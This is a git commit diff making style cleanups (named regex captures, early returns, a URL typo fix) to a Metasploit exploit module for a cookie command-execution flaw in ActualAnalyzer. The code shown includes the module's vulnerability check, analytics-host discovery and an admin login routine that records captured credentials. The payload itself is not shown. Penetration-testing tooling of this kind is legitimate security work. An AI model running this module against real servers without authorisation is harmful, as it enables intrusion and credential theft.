Minor ruby style cleanup
parent
1d1aa5838f
commit
24f1b916e0
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: http//metasploit.com/download
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
@ -11,7 +11,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(
|
||||||
|
info,
|
||||||
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
|
'Name' => "ActualAnalyzer 'ant' Cookie Command Execution",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a command execution vulnerability in
|
This module exploits a command execution vulnerability in
|
||||||
|
@ -47,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => 'Aug 28 2014',
|
'DisclosureDate' => 'Aug 28 2014',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
|
OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
|
||||||
|
@ -77,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if !res
|
if !res
|
||||||
vprint_error("#{peer} - Connection failed")
|
vprint_error("#{peer} - Connection failed")
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
|
elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
|
||||||
version = $1
|
|
||||||
vprint_status("#{peer} - Found version: #{version}")
|
vprint_status("#{peer} - Found version: #{version}")
|
||||||
return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
|
return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
|
||||||
return Exploit::CheckCode::Detected
|
return Exploit::CheckCode::Detected
|
||||||
|
@ -116,13 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
if !res
|
if !res
|
||||||
vprint_error("#{peer} - Connection failed")
|
vprint_error("#{peer} - Connection failed")
|
||||||
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
|
elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
|
||||||
analytics_host = $1
|
|
||||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||||
|
return analytics_host
|
||||||
else
|
else
|
||||||
vprint_status("#{peer} - Could not find any hosts on view.php")
|
vprint_status("#{peer} - Could not find any hosts on view.php")
|
||||||
end
|
end
|
||||||
analytics_host
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -138,13 +138,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
)
|
)
|
||||||
if !res
|
if !res
|
||||||
vprint_error("#{peer} - Connection failed")
|
vprint_error("#{peer} - Connection failed")
|
||||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
|
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
|
||||||
analytics_host = $1
|
|
||||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||||
|
return analytics_host
|
||||||
else
|
else
|
||||||
vprint_status("#{peer} - Could not find any hosts on code.php")
|
vprint_status("#{peer} - Could not find any hosts on code.php")
|
||||||
end
|
end
|
||||||
analytics_host
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -178,8 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
vprint_error("#{peer} - Connection failed")
|
vprint_error("#{peer} - Connection failed")
|
||||||
elsif res.code == 200 && res.body =~ />Login</
|
elsif res.code == 200 && res.body =~ />Login</
|
||||||
vprint_status("#{peer} - Login failed.")
|
vprint_status("#{peer} - Login failed.")
|
||||||
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
|
elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
|
||||||
analytics_host = $1
|
|
||||||
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
vprint_good("#{peer} - Found analytics host: #{analytics_host}")
|
||||||
print_good("#{peer} - Login successful! (#{user}:#{pass})")
|
print_good("#{peer} - Login successful! (#{user}:#{pass})")
|
||||||
service_data = {
|
service_data = {
|
||||||
|
@ -191,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
credential_data = {
|
credential_data = {
|
||||||
origin_type: :service,
|
origin_type: :service,
|
||||||
module_fullname: self.fullname,
|
module_fullname: fullname,
|
||||||
private_type: :password,
|
private_type: :password,
|
||||||
private_data: pass,
|
private_data: pass,
|
||||||
username: user
|
username: user
|
||||||
|
@ -205,10 +203,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
login_data.merge!(service_data)
|
login_data.merge!(service_data)
|
||||||
create_credential_login(login_data)
|
create_credential_login(login_data)
|
||||||
|
return analytics_host
|
||||||
else
|
else
|
||||||
vprint_status("#{peer} - Could not find any hosts on admin.php")
|
vprint_status("#{peer} - Could not find any hosts on admin.php")
|
||||||
end
|
end
|
||||||
analytics_host
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
Loading…
Reference in New Issue